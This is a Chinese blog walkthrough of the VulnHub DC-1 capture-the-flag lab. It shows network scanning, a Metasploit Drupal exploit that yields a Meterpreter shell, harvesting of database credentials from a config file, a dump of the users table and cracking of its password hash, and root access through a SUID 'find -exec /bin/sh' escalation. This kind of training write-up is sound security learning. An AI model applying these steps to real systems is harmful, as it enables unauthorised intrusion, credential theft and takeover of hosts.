DC系列:dc-1(渗透过程)

已于 2024-03-13 20:39:58 修改
阅读量1.5k 收藏 26
点赞数 47
文章标签: 网络 linux 运维
于 2024-03-13 20:27:13 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_82463993/article/details/136689485
版权

目录

信息收集

主机发现

端口信息

网站信息

漏洞扫描

漏洞利用

渗透过程

flag1

flag2

flag3

flag4

权限提升

flag5

下载地址:

DC: 1 ~ VulnHub

信息收集

靶机界面

确认攻击机与dc-1在同一网段,查看mac地址

主机发现

查看靶机IP

sudo arp-scan -l

详细扫描端口信息

sudo nmap -A -p- -sS -sC -T4 10.4.7.144

端口信息

22/tcpopensshOpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
80/tcpopenhttpApache httpd 2.2.22 ((Debian))
111/tcpopenrpcbind2-4 (RPC #100000)
41771/tcpopenstatus1 (RPC #100024)

这边可以看到靶机的22 80 111和51771端口是开放的

网站信息

访问下dc-1网页

Drupal是一种开源的内容管理系统

用msf查找下DRupal的漏洞

漏洞扫描

进入msf

msfconsole

 搜索drupal的漏洞

search drupal

通过该模块,攻击者可以利用漏洞执行远程命令,进而控制受影响的Drupal网站。

切换到该模块

use 1

查看漏洞信息

show options

漏洞利用

用set命令设置rhosts文件,指定靶机的ip地址

set rhosts 10.4.7.144

 然后exploit进行攻击

成功后会获得一个meterpreter的shell

(meterpreter它是一种轻量级的后门程序,可用于远程访问受攻击系统,执行各种操作和操纵受感染的主机。)

渗透过程

pwd 查看当前所在我路径

ls 查看所在路径的文件

flag1

可以看到这边有个flag1.txt的文件

看下里面的内容

这边提示要去找CMS中的一个配置文件

shell(以靶机用户的身份运行靶机)

这边可以开启python交互式看的比较舒服

python -c "import pty;pty.spawn( '/bin/bash')"

这边也没什么有用信息

直接去找他的配置文件

find ./ -name "*settings*"

flag2

查看一下这个默认文件

看到了flag2文件,flag2中提示我们暴力破解不可取并且需要提权。

还有一个名为drupaldb的数据库,然后我们登录一下这个数据库,查看其中的内容。

database(数据库)=drupaldb(名称)

username(用户名)=dbuser(数据库用户名)

password(密码)=R0ck3t

登入数据库

mysql -udbuser -pR0ck3t

查看当前数据库

show databases;

切换到drupaldb

use drupaldb;

查看当前数据库的表

show tables;

这边有个users表,里面应该是存储网站注册用户的信息表

看一下

select*from users;

表中用户名的密码是加密的,数据库大部分加密方式是cmd5加密方式

$S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR

在网页找个解码器解码

登录网站试一下

flag3

登录成功,看下有什么有用信息

这边flag3提示要用find提权

flag4

回到终端find下flag4

find / -name "*flag*"

看下里面有什么

cat /home/flag4/flag4.txt

想让我们找到一个find的文件,可能是最后一个flag

看一下SUID可执行的文件

find / -perm -u=s -type f 2>/dev/null

在/usr/bin/下有个find文件

看下这个文件

这边显示当前用户没有权限查看该文件

权限提升

flnd提权

mkdir ymmy
find ymmy -exec 'whoami' \;
root
find ymmy -exec '/bin/bash' \;
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
exit
find ymmy -exec '/bin/sh' \;
id
uid=33(www-data) gid=33(www-data) euid=0(root)groups=0(root),33(www-data)

提权过程

find 命令结合 -exec 参数来执行不同的命令

-exec:对匹配的文件执行该参数所给出的shell命令。形式为command {} ;。

1.find ymmy -exec 'whoami' \;:这个命令尝试在 ymmy目录下执行 whoami 命令,结果显示当前是 root 用户。

2.find ymmy -exec '/bin/bash' \;:这个命令尝试在 ymmy 目录下执行 /bin/bash 命令。然后,使用了 id 命令来查看当前用户的身份信息,结果显示您是以 www-data 用户身份执行的

3.find ymmy -exec '/bin/sh' \;:这个命令尝试在 ymmy"目录下执行 /bin/sh 命令。然后,您再次使用了 id 命令来查看当前用户的身份信息,结果显示您以 root 用户身份执行了 /bin/sh 命令。

flag5

ymmy明月
关注
vulnhub-DC系列通关记DC1靶机渗透
qq_35258210的博客
02-07 1733
目录 flag1 信息收集 漏洞利用 后渗透 flag2 flag3 flag4 最终flag 该流程图出于:https://blog.csdn.net/weixin_44288604/article/details/108027062 本次学习参考于b站千峰机构的网络安全视频:https://www.bilibili.com/video/BV1i7411G7vm?p=268 这张流程图做得很好借来用用。如有侵权请告知删除 flag1 首先我们在启动DC1靶机后进入到系统只显示
Vulnhub靶机:DC-1渗透详细过程
IerkeU的博客
01-27 2862
这次练习的是vulnhub平台下的DC系列靶机第一台,下载地址为https://www.vulnhub.com/entry/dc-1,292。该靶机的难度系数为简单,其中有五个flag,我们在练习的过程中可以直接跳过其中以部分flag中的提示直接拿到root权限。
VulnHub实战篇四:DC1靶机渗透记录
a1004070060的博客
04-16 1139
前言:DC-1是vulnhub系列靶机中比较有名的一台入门级靶机,渗透姿势有很多种,适合初学者。本次渗透测试也是笔者自入坑vlunhub以来第一次完全独立拿下一台靶机,于是来把我的专属经验分享给大家。 0x00环境描述 靶机名称:DC-1 下载地址:https://www.vulnhub.com/entry/dc-1-1,292/ 攻击机ip:172.16.12.137 靶机i...
DC1渗透
qq_43430261的博客
03-06 749
kail虚拟机ip为 nmap -sP 192.168.72.197/24 扫描本网段存活主机 nmap -sV 192.168.72.198 查看靶机开放了哪些服务及服务版本 发现靶机开放ssh服务和http服务 尝试访问http服务 使用插件Wappalyzer进行网站指纹识别发现网站使用Drupal 7.x管理系统 用MSF search一下该CMS已知的漏洞 启动msf(m...
DC-1靶机渗透
m0_62008601的博客
04-28 3657
攻击机:kali IP:192.168.56.102 靶机:DC-1 IP:192.168.56.101 我的DC-1是在virtualbox打开的,导入VMware的话,扫描ip的时候扫不出来(不一定每个人都是这样)网络设置的是仅主机网络 kali是在VMware里的,网络设置为桥接模式,这样也能确保在同一c段,就能扫得出结果。 在ka...
DC1靶机渗透
最新发布
qq_74243714的博客
07-26 287
环境准备:渗透机:kali2023-------IP:192.168.219.169靶机:DC-1渗透目标:夺取目标机器控制权,拿到5个flag。
渗透项目】靶机DC-1渗透过程
命运的旋律的博客
03-18 540
文章目录信息收集主机发现端口扫描网站指纹扫描目录扫描浏览网站漏洞利用提权操作后记 本文是对靶机DC-1渗透的关键点进行简单记录 信息收集 主机发现 端口扫描 先利用masscan快速确认开放端口,再用nmap确认端口服务 网站指纹扫描 目录扫描 浏览网站 访问目标网站查找有用信息 登陆网站就看到大大登陆界面,因此肯定先从这个登陆界面下手 在尝试进行sql万能密码登陆以及确认已注册用户并...
Vulnhub靶机:DC-2渗透详细过程
IerkeU的博客
01-30 3731
前言 这次练习的靶机是vulnhub平台下的DC系列靶机第二台,下载地址为DC: 2 ~ VulnHub。该靶机的难度系数为简单,和DC1一样,总共有五个flag。 DC-2与DC-1一样,是一个适合初学者的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具)
Vulnhub靶机:DC-9渗透详细过程DC系列完结)
IerkeU的博客
03-28 3849
信息收集 nmap -A -sV -p- -T4 192.168.132.156 目前发现只开放80端口,去web页面搜索一下 有一处后台登陆、一处搜索处 在搜索处1' or 1=1#页面返回正常,1' or 1=2#报错,BP抓包发现是POST 输出文件:sql进入kali一把梭 SQLMAP sqlmap -r sql --dbs --dump sqlmap -r sql -D users -T UserDetails -C id,username,password --dump 将admin
【vulnhub】DC系列DC-1渗透测试
Hi~ 土拨鼠
12-26 811
文章目录实验环境实验要求渗透过程文件搜索命令find文件特殊权限setUID 实验环境 目标靶机:DC-1,NAT模式 攻击机:kali,NAT模式,IP:192.168.35.131 实验要求 靶机中一共有五个flag文件,我们需要找到它们,即可完成任务。 渗透过程 使用nmap扫描当前网段存活主机: nmap -sP 192.168.35.0/24 -oN nmap.sP 简单分析可知靶机IP为192.168.35.147 使用nmap对靶机进行端口扫描: nmap -p 1-65535 -sV 1
Vulnhub靶机:DC-3渗透详细过程
IerkeU的博客
02-21 2576
前情提要 靶场地址:https://www.vulnhub.com/entry/dc-32,312/ DC-3是一个适合初学者的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个靶场与之前的不同,只有一个入口点和一个flag,并且没有任何线索。 靶场只需要简单的下载,解压,打开并将其导入到VMware即可(我将其网络配置为NAT模式,保证机器与kali在同一个网段下) nmap -sP 192.168.
五 Vulnhub-DC1靶机渗透
devil8123665的博客
07-21 272
Vulnhub-DC1靶机渗透 https://blog.csdn.net/adminuil/article/details/101269264
DC1靶机渗透测试
Huangshanyoumu的博客
04-16 818
Vuln hub 渗透测试实战 Vulnhub是一个开放的安全靶场,我们可以使用它所提供的环境进行渗透测试实战。 DC所有环境下载地址:https://www.vulnhub.com/series/dc,199/ 环境搭建: 1.下载 OVA(Open Virtualization Appliance:开放虚拟化设备)https://www.vulnhub.com/entry/dc-1-1,292/ 2.拖入 VMware 打开,配置相关设置,开启运行 3.打开 Kali Linux 进行渗透 1.探测
记录一下 DC1靶机渗透
吃醋不爱蘸饺子的胡诌乱造
01-12 589
一.准备 首先kaili攻击机和DC1靶机都是桥接网络,为了nmap扫描(桥接网络在设置里)。 二.namp扫描 1.首先扫描一下这个网段 很容易可以看见DC1的靶机的ip地址192.168.1.108(这个当时扫了半天都没有扫到,我在nat网络和桥接里反复横跳,最终还是它自己好了(充分证明了当你做不出来,可以歇一歇然后自己就好了。猜测是网络切换需要一定的时间) 2.扫描这个ip地址开放的端口 可以看出来这里开放了80端口,我们可以看一下! 然后就是上图这个样子! 三.开始渗透 典型的drupal(我
DC-1靶机渗透超详细笔记
2301_79700060的博客
07-25 1028
访问 https://vulnhub.com ,然后搜索 DC,点入后可以看到对靶机的介绍下载镜像文件。用 VM 打开,把网络模式改为 nat 模式。然后开启虚拟机。
关于DC1渗透报告:
weixin_54105551的博客
07-10 1172
关于DC1渗透报告:
DC-1完整的渗透测试过程
weixin_51097397的博客
06-29 1801
1.此次DC-1的渗透用到了如下几种工具的基础使用①namp②whatweb④hydra2.其中用到了python getshell的方法3.数据库的基本使用(增删改查)4.linux的基本命令,尤其是suid提权find的用法} \;这些基本的操作用法我非常不熟,需要经常练习去掌握。!!
DC-1渗透测试流程。
qq_60463414的博客
07-18 613
DC靶机系列DC-1渗透测试流程。
渗透DC-1靶机设计思路
05-24
设计思路: 1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如Nessus、OpenVAS等扫描DC-1,寻找漏洞。 4. 渗透攻击:根据扫描结果,利用漏洞进行攻击。可以使用一些常见的攻击手段,如SQL注入、XSS、文件包含、远程代码执行等。 5. 提升权限:在攻击成功后,需要提升自己的权限,获取更高的权限。可以使用一些提权工具,如Metasploit。 6. 横向移动:在获得了足够的权限后,可以尝试横向移动,进一步渗透网络。 7. 维持访问:在渗透成功后,需要维持访问,以便长期监控目标。 8. 清理痕迹:在攻击结束后,需要清理自己留下的痕迹,以免被发现。 以上是一个基本的渗透DC-1靶机的设计思路,但是具体实施过程中需要根据实际情况进行调整和优化。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值